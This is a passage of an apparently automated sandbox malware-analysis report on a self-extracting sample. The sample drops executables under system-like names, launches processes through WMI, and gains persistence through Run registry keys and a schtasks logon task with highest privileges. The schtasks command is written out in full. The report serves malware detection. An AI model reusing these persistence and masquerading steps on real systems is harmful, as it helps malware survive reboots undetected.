Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: mscoree.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: apphelp.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: version.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: wldp.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: profapi.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: sspicli.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: mscoree.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: version.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: uxtheme.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: windows.storage.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: wldp.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: profapi.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: cryptsp.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: rsaenh.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: cryptbase.dll
Source: C:\Windows\ShellNew\WinStore.App.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: version.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WWanAPI\dwm.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: mscoree.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: version.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: wldp.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: profapi.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: sspicli.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: amsi.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: userenv.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: rasman.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: rtutils.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: mswsock.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: winhttp.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: winnsi.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\jOMfQSwRhTi.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: mscoree.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: version.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: amsi.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: rasapi32.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: rasman.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: rtutils.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\hh\explorer.exe	Section loaded: fwpuclnt.dll

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: LisectAVT_2403002A_442.exe

Static file information: File size 2294465 > 1048576

Source: LisectAVT_2403002A_442.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LisectAVT_2403002A_442.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LisectAVT_2403002A_442.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LisectAVT_2403002A_442.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LisectAVT_2403002A_442.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LisectAVT_2403002A_442.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: LisectAVT_2403002A_442.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: LisectAVT_2403002A_442.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: LisectAVT_2403002A_442.exe

Source: LisectAVT_2403002A_442.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LisectAVT_2403002A_442.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LisectAVT_2403002A_442.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LisectAVT_2403002A_442.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LisectAVT_2403002A_442.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

File created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\__tmp_rar_sfx_access_check_6411015

Jump to behavior

Source: LisectAVT_2403002A_442.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006FE28C push eax; ret	0_2_006FE2AA
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006FED46 push ecx; ret	0_2_006FED59
Source: C:\Windows\System32\WWanAPI\dwm.exe	Code function: 22_2_00007FF887B267CD push ecx; retf	22_2_00007FF887B2685C

Source: perfCrtmonitorsvcMonitorDll.exe.0.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: jOMfQSwRhTi.exe.5.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: WinStore.App.exe.5.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: explorer.exe.5.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: jOMfQSwRhTi.exe0.5.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: dwm.exe.5.dr	Static PE information: section name: .text entropy: 7.402788970663933

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\hh\explorer.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\WWanAPI\dwm.exe			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe	Executable created and started: C:\Windows\ShellNew\WinStore.App.exe	Jump to behavior
Source: unknown	Executable created and started: C:\Windows\hh\explorer.exe
Source: unknown	Executable created and started: C:\Windows\System32\WWanAPI\dwm.exe

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\ShellNew\WinStore.App.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\hh\explorer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Users\user\jOMfQSwRhTi.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Recovery\jOMfQSwRhTi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	File created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\WWanAPI\dwm.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

File created: C:\Users\user\jOMfQSwRhTi.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\ShellNew\WinStore.App.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\hh\explorer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\WWanAPI\dwm.exe	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.App	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jOMfQSwRhTi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

File created: C:\Users\user\jOMfQSwRhTi.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\WWanAPI\dwm.exe'" /rl HIGHEST /f

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jOMfQSwRhTi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jOMfQSwRhTi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.App	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.App	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jOMfQSwRhTi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jOMfQSwRhTi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jOMfQSwRhTi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jOMfQSwRhTi	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
